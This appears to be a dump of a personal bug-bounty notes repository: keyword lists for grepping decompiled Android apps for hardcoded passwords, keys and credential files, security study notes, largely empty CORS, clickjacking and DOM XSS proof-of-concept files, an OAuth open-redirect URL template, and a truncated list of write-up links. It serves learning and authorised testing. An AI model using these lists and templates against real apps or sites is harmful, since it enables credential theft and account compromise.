├── Android_Static_code_review ├── Basics.md ├── CORS-POC ├── 1.html ├── 2.html ├── 3.html └── Exploit-with-xss.md ├── Clickjacking.html ├── Clickjacking2.html ├── DOM_XSS_eventlistner ├── Oauth.md ├── README.md ├── XSS_payloads.md ├── XSSpotter.py ├── amsi.md ├── json_CSRF.html └── test.js /Android_Static_code_review: -------------------------------------------------------------------------------- 1 | apkx 2 | dex2jar-d2j 3 | export source code 4 | 5 | 6 | grep -ir password 7 | grep -ir sql 8 | grep -ir passwd 9 | grep -ir pwd 10 | grep -ir 'http://' 11 | grep -ir 'https://' 12 | grep -ir 'api_key' 13 | grep -ir 'api-key' 14 | grep -ir apikey 15 | grep -ir username 16 | grep -Eori 'https?://[^[:space:]]+' 17 | 18 | 19 | Save the below in a file and run *grep -ir -f a.txt* 20 | 21 | 22 | credentials 23 | firebase 24 | database 25 | constants 26 | global 27 | token 28 | secure 29 | prod 30 | 31 | .mlab.com password 32 | access_key 33 | access_token 34 | amazonaws 35 | api.googlemaps AIza 36 | api_key 37 | api_secret 38 | apidocs 39 | apikey 40 | apiSecret 41 | app_key 42 | app_secret 43 | appkey 44 | appkeysecret 45 | application_key 46 | appsecret 47 | appspot 48 | auth_token 49 | authorizationToken 50 | aws_access 51 | aws_access_key_id 52 | aws_key 53 | aws_secret 54 | aws_token 55 | AWSSecretKey 56 | bashrc password 57 | bucket_password 58 | client_secret 59 | cloudfront 60 | codecov_token 61 | conn.login 62 | connectionstring 63 | consumer_key 64 | database_password 65 | db_password 66 | db_username 67 | dbpasswd 68 | dbpassword 69 | dbuser 70 | dot-files 71 | dotfiles 72 | encryption_key 73 | fabricApiSecret 74 | fb_secret 75 | ftp 76 | gh_token 77 | github_key 78 | github_token 79 | gitlab 80 | gmail_password 81 | gmail_username 82 | herokuapp 83 | irc_pass 84 | JEKYLL_GITHUB_TOKEN 85 | keyPassword 86 | ldap_password 87 | ldap_username 88 | mailchimp 89 | mailgun 90 | master_key 91 | mydotfiles 92 | mysql 93 | node_env 94 | npmrc _auth 95 | oauth_token 96 | passwd 97 | password 98 | passwords 99 | pem private 100 | preprod 101 | private_key 102 | pwd 103 | pwds 104 | rds.amazonaws.com password 105 | redis_password 106 | root_password 107 | secret 108 | secret.password 109 | secret_access_key 110 | secret_key 111 | secret_token 112 | secrets 113 | security_credentials 114 | send.keys 115 | send_keys 116 | sendkeys 117 | SF_USERNAME salesforce 118 | sf_username 119 | FIREBASE_API_JSON= 120 | slack_api 121 | slack_token 122 | sql_password 123 | ssh 124 | ssh2_auth_password 125 | sshpass 126 | staging 127 | storePassword 128 | stripe 129 | swagger 130 | testuser 131 | x-api-key 132 | xoxb 133 | xoxp 134 | [WFClient] Password= 135 | access_key 136 | bucket_password 137 | dbpassword 138 | dbuser 139 | .bash_history 140 | .bash_history DOMAIN-NAME 141 | .bash_profile aws 142 | .bashrc mailchimp 143 | .bashrc password 144 | .cshrc 145 | .dockercfg auth 146 | .env DB_USERNAME NOT homestead 147 | .env MAIL_HOST=smtp.gmail.com 148 | .esmtprc password 149 | .ftpconfig 150 | .git-credentials 151 | .history 152 | .htpasswd 153 | .netrc password 154 | .npmrc _auth 155 | .pgpass 156 | .remote-sync.json 157 | .s3cfg 158 | .sh_history 159 | .tugboat NOT _tugboat 160 | _netrc password 161 | apikey 162 | bash 163 | bash_history 164 | bash_profile 165 | bashrc 166 | beanstalkd.yml 167 | CCCam.cfg 168 | composer.json 169 | config irc_pass 170 | config.json auths 171 | config.php dbpasswd 172 | configuration.php JConfig password 173 | connections 174 | connections.xml 175 | credentials aws_access_key_id 176 | cshrc 177 | dbeaver-data-sources.xml 178 | deployment-config.json 179 | dhcpd.conf 180 | dockercfg 181 | environment 182 | express.conf 183 | express.conf path:.openshift 184 | filezilla.xml 185 | filezilla.xml 186 | git-credentials 187 | gitconfig 188 | htpasswd 189 | hub oauth_token 190 | id_dsa 191 | id_rsa 192 | id_rsa or filename:id_dsa 193 | idea14.key 194 | known_hosts 195 | logins.json 196 | makefile 197 | master.key 198 | netrc 199 | npmrc 200 | pgpass 201 | proftpdpasswd 202 | robomongo.json 203 | s3cfg 204 | SECRET_KEY 205 | sftp-config.json 206 | sftp-config.json 207 | sftp.json 208 | sshd_config 209 | tugboat 210 | ventrilo_srv.ini 211 | WebServers.xml 212 | wp-config 213 | wp-config.php 214 | zhrc 215 | HEROKU_API_KEY 216 | HEROKU_API_KEY 217 | HOMEBREW_GITHUB_API_TOKEN 218 | msg nickserv identify 219 | AWS_ACCESS_KEY_ID 220 | list_aws_accounts 221 | aws_access_key 222 | aws_secret_key 223 | bucket_name 224 | S3_ACCESS_KEY_ID 225 | S3_BUCKET 226 | S3_ENDPOINT 227 | S3_SECRET_ACCESS_KEY 228 | databases password 229 | PT_TOKEN 230 | redis_password 231 | root_password 232 | secret_access_key 233 | SECRET_KEY_BASE= 234 | shodan_api_key 235 | WORDPRESS_DB_PASSWORD= 236 | AWS_SECRET_ACCESS_KEY 237 | API KEY 238 | API SECRET 239 | API TOKEN 240 | ROOT PASSWORD 241 | ADMIN PASSWORD 242 | GCP SECRET 243 | AWS SECRET 244 | -------------------------------------------------------------------------------- /Basics.md: -------------------------------------------------------------------------------- 1 | ----------------- 2 | Crypto 3 | 4 | bit - 0 or 1 5 | 1 byte - 8bit 6 | 7 | Steam cipher - symmetric - take one bit/byte at a time and do XORing 8 | Block cipher - symmetric - take one block (64bit,128bit etc) at a time - blowfish, aed, des 9 | 10 | Confusion - try to make the Relation between plaintext and cipher texT AS complex as possible, if we change 1 bit of plaintext then half or more bit of cipher text should also change. 11 | Defusion - try to make the Relation between key and cipher texT AS complex as possible, if we change 1 bit of key then almost all bits of cipher text should change. 12 | 13 | 14 | Symmetric - AES 256 - 15 | Asymmetrric - RSA - 16 | 17 | Since RSA cannot encrypt long messages, we can use AES to encrypt and encrypt the AES key using RSA to securely share it to someone. 18 | 19 | ------------------- 20 | 21 | SSL Handshake - 22 | 23 | Client Hello 24 | Server Hello with Certificate which contains Public Key 25 | Client Verifies the Certificate from CA provider (expiration, validity etc) and check the Cipers which both supports to use 26 | Client generates a key which he encodes using server public key and send it to server (key is symmectric encr) (To enusure if server is who he say he is) 27 | Server decrypt the key using asymeetric encr (private key) and estabilish a secure encrypted communication. 28 | 29 | 30 | Mutual TLS 31 | 32 | Client Hello. 33 | Server Hello with Certificate (public key) to the client. 34 | Client then confirm the CAs whether it’s a valid certificate issued by them or not. This step to make sure server is who its claming to be. 35 | Client share his cert and then server verifeis if client is allowed/whitelisted and in the Trust store or not. 36 | And then use a aggreed upon secret in symmetric encrpytion. 37 | 38 | -------------------- 39 | 40 | 41 | PIA data is stored how? - Encryption - Symmetric or Assymetric depening of the need. 42 | password hasing how? - best practice hash - Argon2 or Bcrypt with SALT 43 | To verify file signatures and certificates, SHA-256 44 | Hashing Rounding - taking a hash -> changing 1 bit and rehashing it. 45 | 46 | 47 | ------------- 48 | Devsecops 49 | 50 | STRIDE - Security threat model framework used to identify potential threats to applications. Each letter in the STRIDE acronym represents a different type of threat: 51 | 52 | Spoofing 53 | Tampering 54 | 55 | Information Disclosure 56 | Denial of Service (DoS) 57 | Elevation of Privilege 58 | 59 | 60 | THREAD MODDELING - Structured process of identifying, assessing, and mitigating security risks in software applications by analyzing the interactions and behaviors of threads, which are concurrent execution units, within the application's architecture and design. 61 | 62 | Continues Integration/CD -> Dependency Check SCA (Checkmarx)- SAST (checkmarx) - pull DOCKER and SCAN -> PUSH CODE in docker -> OS Hardeding (scanning the final docker in which application is running) 63 | 64 | SHIFT LEFT Approach - implementing securtiy as early in SDLC as possible. 65 | 66 | how the after encryption key is stored? 0in valut 67 | hashicorp vault 68 | 69 | ---------- 70 | 71 | 72 | MOBILE 73 | 74 | Certificate Pinning Bypass - 2 methods: By making changes in Source code OR Android SSL-Trust-Killer application or similar modules in xposed 75 | 76 | Approach - shared pref, folder permissions, MODE_WORLD_READBALE writable files and folders, allow_backup should be false,allow_debug should be false,READ_LOGS flag, static analysis, dex2jar, jd-gui, hardcoded, aws urls, internalIPs, drozer, 77 | 78 | LOGS - 79 | Copy/Paste - other malicious application can access clipboard and steal data 80 | 81 | Exported Content Provider - Could contain keys, creds, secrets 82 | Exported Activities and Permissions - Open after auth activity using (drozer) 83 | Attacking Services- Any exported service(for ex: location) can be executed without any auth through malicious application (drozer) (this will enalbed location of the andriod device) 84 | 85 | 86 | code obfuscation with the help of Proguard to avoid jd-gui - dont stop completly but slow down the RE 87 | 88 | how jwt should be stored in android. or any other auth token - 89 | - encrypt using 3rd party or EncryptedSharedPreferences lib and store In shared pref 90 | - Store tokens in memory while app runs, for short term sessions. 91 | - In Android Keystore 92 | - Biometric Authentication 2fa for Android Keystore 93 | 94 | 95 | rootdetectuion - rootbear 96 | sslpinning bypass xposed - frida 97 | MOBSF 98 | 99 | 100 | webview - load webpage within application 101 | deeplink - customeschemma://call/profiledelete 102 | 103 | CSRF - deleteprofile deeplink, any 3rd party applicaiton can call the deeplink and deleteprofile_- (autoverify = true) should be set in AndriodManifest to remidiate this. 104 | openredirect- find deeplink with intent-filter and schema. and execute 105 | 106 | Intent can be used for 107 | 108 | To start an Activity, typically opening a user interface for an app 109 | As broadcasts to inform the system and apps of changes 110 | To start, stop, and communicate with a background service 111 | 112 | 113 | 114 | 115 | ---------- 116 | Web 117 | 118 | 119 | HTTP DYSYNC 120 | Deserialization 121 | 122 | DOM - 123 | sources: 124 | document.URL 125 | document.documentURI 126 | document.URLUnencoded 127 | document.baseURI 128 | location.search 129 | document.cookie 130 | document.referrer 131 | 132 | sinks: 133 | eval 134 | element.innerHTML 135 | element.outerHTML 136 | element.insertAdjacentHTML 137 | element.onevent 138 | document.write() 139 | document.writeln() 140 | document.domain 141 | 142 | 143 | 144 | * Oauth flows - 145 | Authorization Code Flow - Authorization token is reviced and then back-end server-server communication for accesstoken and userdetails 146 | Implicit Grant Type - Used for single page application since, there is no backend. they directly recive the acecss token through the interceptanle request and then send a post request to save it in the dataabsed if needed for furute for user login 147 | 148 | State 149 | redirect_uri + open redirect chain 150 | 151 | 152 | OPENID - layer on top of oauth for authentication 153 | - scope openid - must 154 | - id_token - jwt token recevied with access token as identify identifer of user 155 | 156 | attack - self client register with redirect_uri ,logo uri , which is getting trigged causeing an ssrf 157 | 158 | 159 | 160 | 161 | ------ 162 | Network 163 | 164 | OSI - Common Attacks 165 | 166 | 167 | Physical - Cables, wire, Bluethooth, USB, LAN - DOS attacks, MITM physical device 168 | DataLink - ARP, WAN - ArpSpoofing, Mac Flooding 169 | Network - IMCP, IPv4, IPv6, IPsec - IP Spoofing 170 | Transport - TCP/UDP - DDOS- SYN Flood 171 | sessions - NetBios - Session Hijacking 172 | Presentation - SSL - SSL Hijacking MITM 173 | Application Layer - ALL the web related attacks - SQLi, xss, parameter tampering 174 | 175 | All people should try new dominos pizza 176 | 177 | 178 | evildropping 179 | DNS posinoing - 180 | arp SPoofing - Mac:IP 181 | ----------- 182 | 183 | Hardik - 184 | 185 | Bufferover flow basic 186 | 187 | Application take username input of 8 char, we give more chars and application should give error if we give more and should not process the input, buffer overflow occurs when ex. we give 10 char input and application processes that last of char input. that is executed in the memorty, attacker could run malicious shell script, rev shell etc. 188 | 189 | 190 | Network 191 | 192 | How does Nmap work? 193 | Ping work? 194 | 195 | --------- 196 | Config Review. CIS BenchMark/ TrendMicro 197 | Azure Benchmark foundation 198 | GCP Benchmark 199 | AWS Benchmark 200 | 201 | palo alto 202 | 203 | Components/services - iam , lambda, eks, 204 | ------ 205 | 206 | 207 | Owasp cheatsheet - 208 | 209 | Database 210 | Crypto 211 | TLS 212 | CSRF 213 | DOM BASED XSS 214 | Mobile Applicatino 215 | Cloud Architecture Security 216 | Arcitechture review 217 | Secret Management 218 | 219 | 220 | 221 | 222 | **Firewalls** control and filter network traffic to protect against unauthorized access and cyber threats. Control What goes out of internal network and what req comes in. 223 | 224 | **Intrusion Detection Systems (IDS)** monitor network traffic for signs of potential attacks and generate alerts. 225 | 226 | **Intrusion Prevention Systems (IPS)** go a step further by not only detecting threats but actively blocking or mitigating them to protect your network in real-time. 227 | 228 | 229 | 230 | 231 | 232 | ------ 233 | 234 | 235 | **Secure Shell (SSH)** - A network protocol that provides secure access to remote systems and encrypted data communication. 236 | 237 | **Secure Sockets Layer (SSL)** - A security protocol that ensures encrypted and secure communication over the internet, commonly used in web browser and a web server. 238 | 239 | **Transport Layer Security (TLS)** - A cryptographic protocol that ensures secure communication over internet. It is an updated and more secure version of SSL (Secure Sockets Layer) and is commonly used to encrypt data transmitted between a client (e.g., web browser) and a server, providing confidentiality and integrity of the information exchanged. 240 | 241 | **Internet Protocol Security (IPsec)** - set of protocols used to secure Internet Protocol (IP) communications (IPs, router, server, http-https,ftp,ssh,packets etc ). It provides authentication, encryption, and data integrity for data transmitted over IP networks, ensuring the confidentiality and security of network traffic. IPsec is often used to establish virtual private networks (VPNs) and secure communication between networked devices. 242 | 243 | IP communications enable devices worldwide to exchange data over the internet. It's the language that devices use to talk to each other, and it forms the backbone of our digital connectivity. 244 | 245 | **Domain Name System Security Extensions (DNSSEC)** - Set of protocols and security measures designed to enhance the security of the DNS. DNS is responsible for translating human-friendly domain names (like www.example.com) into IP addresses that computers and servers use to locate each other on the internet. 246 | 247 | DNSSEC adds a layer of security to this translation process by digitally signing (asymmetric cryptograpy) DNS data. 248 | 249 | 250 | 251 | 252 | --------- 253 | 254 | 255 | 256 | ### Applied cryptography: 257 | 258 | **Symmetric encryption** - One Key Shared with All - AES 259 | 260 | **Asymmetric encryption** - Public And Private Key - RSA 261 | 262 | **Hashing** - Integrity of data (Password should be hashed with random salt) 263 | 264 | 265 | 266 | # Hashing vs. Encryption vs. Encoding 267 | 268 | ## Hashing 269 | 270 | - **Purpose:** Hashing is primarily used to transform data into a fixed-size string of characters, known as a hash value or digest. It is commonly used for data integrity verification and data retrieval. 271 | 272 | - **Operation:** It is a one-way process, meaning it cannot be reversed to obtain the original data. 273 | 274 | - **Security:** Hashing is not designed for data security or confidentiality; its primary purpose is data integrity verification. 275 | 276 | - **Use Cases:** Hashing is used in password storage (with salting), digital signatures, verifying file integrity, and in data structures like hash tables for efficient data retrieval. 277 | 278 | ## Encryption 279 | 280 | - **Purpose:** Encryption is used to protect data confidentiality by converting plain text (original data) into a ciphertext (encrypted data) that can only be read by authorized parties with the decryption key. 281 | 282 | - **Operation:** Two way - Public Private Key. 283 | 284 | - **Security:** Encryption is focused on protecting data from unauthorized access. It ensures that even if someone gains access to the encrypted data, they cannot decipher it without the decryption key. 285 | 286 | - **Use Cases:** Encryption is widely used in securing communications (e.g., SSL/TLS for secure web browsing), protecting sensitive data at rest (e.g., full-disk encryption), and ensuring data privacy. 287 | 288 | ## Encoding 289 | 290 | - **Purpose:** Encoding is used to represent data in a specific format for data transmission . It doesn't provide security or data transformation like hashing or encryption. 291 | 292 | - **Operation:** Encoding translates data from one format to another, typically using a well-defined scheme. It's a reversible process, meaning the original data can be obtained by decoding it. 293 | 294 | - **Security:** Encoding is not a security measure. It's used to ensure that data is in a format that can be correctly processed by various systems and protocols. 295 | 296 | - **Use Cases:** Encoding is used in various scenarios, such as URL encoding for web addresses, Base64 encoding for binary-to-text conversion, and character encoding (e.g., UTF-8) for international character representation. 297 | 298 | 299 | 300 | 301 | 302 | # Digital Signatures vs. Hashing 303 | 304 | Digital signatures and hashing are both cryptographic techniques used to ensure the integrity and authenticity of data, but they serve different purposes and have distinct characteristics: 305 | 306 | ## Purpose 307 | 308 | - **Digital Signatures:** Digital signatures are primarily used to verify the authenticity of a document or message and ensure that it has not been tampered with during transmission. They provide a means to prove the identity of the sender and guarantee that the sender has endorsed the content. 309 | 310 | - **Hashing:** Hashing is used to create a fixed-length string of characters (the hash value or digest) from any input data, regardless of its size. Hashing is primarily used for data integrity verification. It ensures that data has not changed by comparing the hash of the original data with the hash of the received data. 311 | 312 | ## Operation 313 | 314 | - **Digital Signatures:** Digital signatures involve the use of asymmetric cryptography. A private key is used to create the signature, and a corresponding public key is used to verify it. 315 | 316 | - **Hashing:** Hashing uses a one-way hash function to transform data into a fixed-size string of characters. It is a one-way process, meaning it cannot be reversed to obtain the original data. 317 | 318 | ## Verification 319 | 320 | - **Digital Signatures:** Verification of a digital signature requires the sender's public key and the signature itself. The recipient can confirm the authenticity of the message and the sender's identity. 321 | 322 | - **Hashing:** Hash verification only requires the hash value of the original data and the recalculated hash of the received data. If the two hash values match, the data is considered intact. 323 | 324 | ## Use Cases 325 | 326 | - **Digital Signatures:** Used in scenarios where both data integrity and sender authentication are important, such as secure email communication, digital contracts, and software updates. 327 | 328 | - **Hashing:** Used for data integrity checks, password storage (by hashing and salting), and in various data structures like hash tables for efficient data retrieval. 329 | 330 | In summary, digital signatures are more focused on data integrity and sender authentication, while hashing is primarily used for data integrity verification. These techniques are often used in combination to ensure the security of digital communications and data storage. 331 | -------------------------------------------------------------------------------- /CORS-POC/1.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |

5 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /CORS-POC/2.html: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | -------------------------------------------------------------------------------- /CORS-POC/3.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 17 | 18 | 19 |
20 |

CORS PoC Exploit

21 |
22 | 23 |
24 | 25 | 26 | -------------------------------------------------------------------------------- /CORS-POC/Exploit-with-xss.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 17 | ``` 18 | 19 | https://example.com/search?tmp=ABOVE PAYLAOD 20 | -------------------------------------------------------------------------------- /Clickjacking.html: -------------------------------------------------------------------------------- 1 | 16 |
click
17 | // make div a button for more flexible attack 18 | 19 | -------------------------------------------------------------------------------- /Clickjacking2.html: -------------------------------------------------------------------------------- 1 | 16 |
click
17 | 18 | -------------------------------------------------------------------------------- /DOM_XSS_eventlistner: -------------------------------------------------------------------------------- 1 | window.addEventListener('message', function(e) { 2 | document.getElementById('ads').innerHTML = e.data; 3 | }) 4 | 5 | Attacker.html 6 | 12 | -------------------------------------------------------------------------------- /Oauth.md: -------------------------------------------------------------------------------- 1 | If there is Oauth See for Open_Redirection 2 | 3 | ``` 4 | Url encoding is important, also change the client_id as per the application. 5 | 6 | https://www.target.com/oauth/authorize?response_type=token&redirect_uri=http%3A%2F%2Fgoogle.com%3A80%2F&scope=profile&client_id=ADDTHECLIENTIDHERE 7 | ``` 8 | This url will redirect to google.com 9 | 10 | attacker can redirect to any website. 11 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Bug Bounty Reference 2 | 3 | A list of bug bounty write-up that is categorized by the bug nature, this is inspired by https://github.com/djadmin/awesome-bug-bounty 4 | 5 | Here You can find the writeups of all the bugs that was awesome. 6 | 7 | - [XSSI](#xssi) 8 | - [Cross-Site Scripting (XSS)](#cross-site-scripting-xss) 9 | - [Brute Force](#brute-force) 10 | - [SQL Injection (SQLi)](#sql-injection) 11 | - [External XML Entity Attack (XXE)](#xxe) 12 | - [Remote Code Execution (RCE)](#remote-code-execution) 13 | - [Deserialization](#deserialization) 14 | - [Image Tragick](#image-tragick) 15 | - [Cross-Site Request Forgery (CSRF)](#csrf) 16 | - [Insecure Direct Object Reference (IDOR)](#insecure-direct-object-reference-idor) 17 | - [Stealing Access Token](#stealing-access-token) 18 | - [Google Oauth Login Bypass](#google-oauth-bypass) 19 | - [Server Side Request Forgery (SSRF)](#server-side-request-forgery-ssrf) 20 | - [Unrestricted File Upload](#unrestricted-file-upload) 21 | - [Race Condition](#race-condition) 22 | - [Business Logic Flaw](#business-logic-flaw) 23 | - [Authentication Bypass](#authentication-bypass) 24 | - [HTTP Header Injection](#http-header-injection) 25 | - [Email Related](#email-related) 26 | - [Money Stealing](#money-stealing) 27 | - [Miscellaneous](#miscellaneous) 28 | 29 | ### Cross-Site Scripting (XSS) 30 | 31 | - [Sleeping stored Google XSS Awakens a $5000 Bounty](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) by Patrik Fehrenbach 32 | - [RPO that lead to information leakage in Google](http://blog.innerht.ml/rpo-gadgets/) by filedescriptor 33 | - [God-like XSS, Log-in, Log-out, Log-in](https://whitton.io/articles/uber-turning-self-xss-into-good-xss/) in Uber by Jack Whitton 34 | - [Three Stored XSS in Facebook](http://www.breaksec.com/?p=6129) by Nirgoldshlager 35 | - [Using a Braun Shaver to Bypass XSS Audit and WAF](https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) by Frans Rosen 36 | - [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton 37 | - he is able to make stored XSS from a irrelevant domain to main facebook domain 38 | - [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton 39 | - [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes 40 | - [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek 41 | - [Command Injection in Google Console](http://www.pranav-venkat.com/2016/03/command-injection-which-got-me-6000.html) by Venkat S 42 | - [Facebook's Moves - OAuth XSS](http://www.paulosyibelo.com/2015/12/facebooks-moves-oauth-xss.html) by PAULOS YIBELO 43 | - [Stored XSS in Google Docs (Bug Bounty)](http://hmgmakarovich.blogspot.hk/2015/11/stored-xss-in-google-docs-bug-bounty.html) by Harry M Gertos 44 | - [Stored XSS on developer.uber.com via admin account compromise in Uber](https://hackerone.com/reports/152067) by James Kettle (albinowax) 45 | - [Yahoo Mail stored XSS](https://klikki.fi/adv/yahoo.html) by Klikki Oy 46 | - [Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212)](http://mksben.l0.cm/2016/07/xxn-caret.html) by Masato Kinugawa 47 | - [Youtube XSS](https://labs.detectify.com/2015/06/06/google-xss-turkey/) by fransrosen 48 | - [Best Google XSS again](https://sites.google.com/site/bughunteruniversity/best-reports/openredirectsthatmatter) - by Krzysztof Kotowicz 49 | - [IE & Edge URL parsin Problem](https://labs.detectify.com/2016/10/24/combining-host-header-injection-and-lax-host-parsing-serving-malicious-data/) - by detectify 50 | - [Google XSS subdomain Clickjacking](http://sasi2103.blogspot.sg/2016/09/combination-of-techniques-lead-to-dom.html) 51 | - [Microsoft XSS and Twitter XSS](http://blog.wesecureapp.com/xss-by-tossing-cookies/) 52 | - [Google Japan Book XSS](http://nootropic.me/blog/en/blog/2016/09/20/%E3%82%84%E3%81%AF%E3%82%8A%E3%83%8D%E3%83%83%E3%83%88%E3%82%B5%E3%83%BC%E3%83%95%E3%82%A3%E3%83%B3%E3%82%92%E3%81%97%E3%81%A6%E3%81%84%E3%81%9F%E3%82%89%E3%81%9F%E3%81%BE%E3%81%9F%E3%81%BEgoogle/) 53 | - [Flash XSS mega nz](https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-co-nz-xss/) - by frans 54 | - [Flash XSS in multiple libraries](https://olivierbeg.com/finding-xss-vulnerabilities-in-flash-files/) - by Olivier Beg 55 | - [xss in google IE, Host Header Reflection](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html) 56 | - [Years ago Google xss](http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf) 57 | - [xss in google by IE weird behavior](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html) 58 | - [xss in Yahoo Fantasy Sport](https://web.archive.org/web/20161228182923/http://dawgyg.com/2016/12/07/stored-xss-affecting-all-fantasy-sports-fantasysports-yahoo-com-2/) 59 | - [xss in Yahoo Mail Again, worth $10000](https://klikki.fi/adv/yahoo2.html) by Klikki Oy 60 | - [Sleeping XSS in Google](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) by securityguard 61 | - [Decoding a .htpasswd to earn a payload of money](https://blog.it-securityguard.com/bugbounty-decoding-a-%F0%9F%98%B1-00000-htpasswd-bounty/) by securityguard 62 | - [Google Account Takeover](http://www.orenh.com/2013/11/google-account-recovery-vulnerability.html#comment-form) 63 | - [AirBnb Bug Bounty: Turning Self-XSS into Good-XSS #2](http://www.geekboy.ninja/blog/airbnb-bug-bounty-turning-self-xss-into-good-xss-2/) by geekboy 64 | - [Uber Self XSS to Global XSS](https://httpsonly.blogspot.hk/2016/08/turning-self-xss-into-good-xss-v2.html) 65 | - [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf)](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g) by Marin MoulinierFollow 66 | - [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) by Brett 67 | - [XSSI, Client Side Brute Force](http://blog.intothesymmetry.com/2017/05/cross-origin-brute-forcing-of-saml-and.html) 68 | - [postMessage XSS Bypass](https://hackerone.com/reports/231053) 69 | - [XSS in Uber via Cookie](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/) by zhchbin 70 | - [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP](https://hackerone.com/reports/207042) by frans 71 | - [XSS due to improper regex in third party js Uber 7k XSS](http://zhchbin.github.io/2016/09/10/A-Valuable-XSS/) 72 | - [XSS in TinyMCE 2.4.0](https://hackerone.com/reports/262230) by Jelmer de Hen 73 | - [Pass uncoded URL in IE11 to cause XSS](https://hackerone.com/reports/150179) 74 | - [Twitter XSS by stopping redirection and javascript scheme](http://blog.blackfan.ru/2017/09/devtwittercom-xss.html) by Sergey Bobrov 75 | - [Auth DOM Uber XSS](http://stamone-bug-bounty.blogspot.hk/2017/10/dom-xss-auth_14.html) 76 | - [Managed Apps and Music: two Google reflected XSSes](https://ysx.me.uk/managed-apps-and-music-a-tale-of-two-xsses-in-google-play/) 77 | - [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/) 78 | - [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be) 79 | - [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html) 80 | - [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) 81 | 82 | ### Brute Force 83 | - [Web Authentication Endpoint Credentials Brute-Force Vulnerability](https://hackerone.com/reports/127844) by Arne Swinnen 84 | - [InstaBrute: Two Ways to Brute-force Instagram Account Credentials](https://www.arneswinnen.net/2016/05/instabrute-two-ways-to-brute-force-instagram-account-credentials/) by Arne Swinnen 85 | - [How I Could Compromise 4% (Locked) Instagram Accounts](https://www.arneswinnen.net/2016/03/how-i-could-compromise-4-locked-instagram-accounts/) by Arne Swinnen 86 | - [Possibility to brute force invite codes in riders.uber.com](https://hackerone.com/reports/125505) by r0t 87 | - [Brute-Forcing invite codes in partners.uber.com](https://hackerone.com/reports/144616) by Efkan Gökbaş (mefkan) 88 | - [How I could have hacked all Facebook accounts](http://www.anandpraka.sh/2016/03/how-i-could-have-hacked-your-facebook.html) by Anand Prakash 89 | - [Facebook Account Take Over by using SMS verification code, not accessible by now, may get update from author later](http://arunsureshkumar.me/index.php/2016/04/24/facebook-account-take-over/) by Arun Sureshkumar 90 | 91 | ### SQL Injection 92 | - [SQL injection in Wordpress Plugin Huge IT Video Gallery in Uber](https://hackerone.com/reports/125932) by glc 93 | - [SQL Injection on sctrack.email.uber.com.cn](https://hackerone.com/reports/150156) by Orange Tsai 94 | - [Yahoo – Root Access SQL Injection – tw.yahoo.com](http://buer.haus/2015/01/15/yahoo-root-access-sql-injection-tw-yahoo-com/) by Brett Buerhaus 95 | - [Multiple vulnerabilities in a WordPress plugin at drive.uber.com](https://hackerone.com/reports/135288) by Abood Nour (syndr0me) 96 | - [GitHub Enterprise SQL Injection](http://blog.orange.tw/2017/01/bug-bounty-github-enterprise-sql-injection.html) by Orange 97 | - [Yahoo SQL Injection to Remote Code Exection to Root Privilege](http://www.sec-down.com/wordpress/?p=494) by Ebrahim Hegazy 98 | 99 | ### Stealing Access Token 100 | - [Facebook Access Token Stolen](https://whitton.io/articles/stealing-facebook-access-tokens-with-a-double-submit/) by Jack Whitton - 101 | - [Obtaining Login Tokens for an Outlook, Office or Azure Account](https://whitton.io/articles/obtaining-tokens-outlook-office-azure-account/) by Jack Whitton 102 | 103 | - [Bypassing Digits web authentication's host validation with HPP](https://hackerone.com/reports/114169) by filedescriptor 104 | - [Bypass of redirect_uri validation with /../ in GitHub](http://homakov.blogspot.hk/2014/02/how-i-hacked-github-again.html?m=1) by Egor Homakov 105 | - [Bypassing callback_url validation on Digits](https://hackerone.com/reports/108113) by filedescriptor 106 | - [Stealing livechat token and using it to chat as the user - user information disclosure](https://hackerone.com/reports/151058) by Mahmoud G. (zombiehelp54) 107 | - [Change any Uber user's password through /rt/users/passwordless-signup - Account Takeover (critical)](https://hackerone.com/reports/143717) by mongo (mongo) 108 | - [Internet Explorer has a URL problem, on GitHub](http://blog.innerht.ml/internet-explorer-has-a-url-problem/) by filedescriptor. 109 | - [How I made LastPass give me all your 